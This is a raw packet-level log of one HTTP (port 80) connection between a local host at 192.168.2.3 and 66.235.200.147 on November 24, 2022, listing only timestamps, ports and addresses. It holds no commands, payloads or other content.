Nov 24, 2022 12:20:03.482645035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482656956 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482672930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482691050 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482702017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482731104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482739925 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482758999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482769966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482786894 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482800961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482815027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482824087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482860088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.491141081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.491184950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.491209984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.491236925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.491261005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.491286039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.491312027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.491337061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.491333961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.491419077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.491419077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.491419077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.502724886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.502762079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.502780914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.502800941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.502820015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.502839088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.502857924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.502895117 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.502912998 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.502921104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.502940893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.502962112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.502979994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.502998114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503006935 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.503007889 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.503022909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503024101 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.503050089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503051996 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.503072023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503081083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.503091097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503099918 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.503110886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503122091 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.503160000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.503160000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.503421068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503443956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503469944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503490925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503518105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503545046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503565073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503582001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503601074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503679037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503699064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503719091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503737926 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503757000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503776073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503793955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503799915 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.503813982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503822088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.503832102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503850937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503870964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503889084 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503945112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503964901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.503983974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.504003048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.504020929 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.504041910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.504060984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.504079103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.504096985 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.504116058 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.504134893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.504153967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.504465103 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.504492998 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.504719973 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.524812937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.524869919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.524898052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.524921894 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.524941921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.524960995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.524979115 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.524987936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525005102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525033951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525044918 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525060892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525079012 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525084019 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525109053 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525113106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525140047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525154114 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525167942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525193930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525219917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525230885 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525244951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525258064 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525268078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525291920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525322914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525331974 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525351048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525362015 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525379896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525410891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525438070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525449991 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525466919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525474072 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525494099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525522947 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525547028 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525563002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525574923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525584936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525603056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525625944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525661945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525665998 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525690079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525716066 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525738001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525744915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525767088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525774002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525799990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525816917 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525826931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525852919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525868893 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525880098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525903940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525934935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525942087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.525959015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525984049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.525985956 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.526010990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526031017 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.526036024 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526063919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526089907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526114941 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.526114941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526153088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.526170969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526200056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526216030 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.526226044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526248932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526269913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526297092 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.526298046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526326895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526328087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.526348114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526379108 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526407957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526428938 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.526428938 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.526436090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526468039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526492119 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526520014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526534081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.526549101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526566982 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.526576042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526597977 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.526603937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526632071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526659012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526684999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526684999 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.526714087 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526720047 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.526768923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526798964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526827097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526856899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526861906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.526904106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526937008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526942015 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.526963949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.526983976 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.526990891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527019978 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527045965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527046919 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527075052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527091026 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527102947 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527126074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527154922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527156115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527179003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527204990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527231932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527252913 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527256012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527266979 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527280092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527302980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527317047 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527328014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527343988 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527350903 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527375937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527395010 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527400017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527425051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527448893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527467966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527478933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527506113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527533054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527537107 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527549028 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527559042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527587891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527611017 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527616024 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527640104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527658939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527677059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527683020 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527694941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527709961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527714014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527734995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527750969 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527756929 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527784109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527785063 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527808905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527831078 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527833939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527862072 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527888060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527911901 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527915001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527940989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527960062 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.527965069 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.527990103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528017044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528021097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528039932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528064013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528064013 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528091908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528115034 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528116941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528142929 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528143883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528171062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528193951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528215885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528220892 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528239012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528264046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528290033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528312922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528336048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528354883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528354883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528354883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528357983 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528382063 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528398991 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528407097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528434992 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528436899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528456926 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528484106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528505087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528511047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528527021 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528536081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528559923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528584003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528585911 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528609037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528631926 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528636932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528660059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528683901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528690100 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528707981 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528733969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528754950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528780937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528800964 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528803110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528820992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528825045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528834105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528850079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528870106 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528872013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528896093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528918982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528943062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528958082 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.528968096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.528990984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529012918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529036045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529041052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529041052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529062033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529073000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529088020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529112101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529113054 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529135942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529139042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529158115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529159069 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529182911 CET	80	49710	66.235.200.147	192.168.2.3
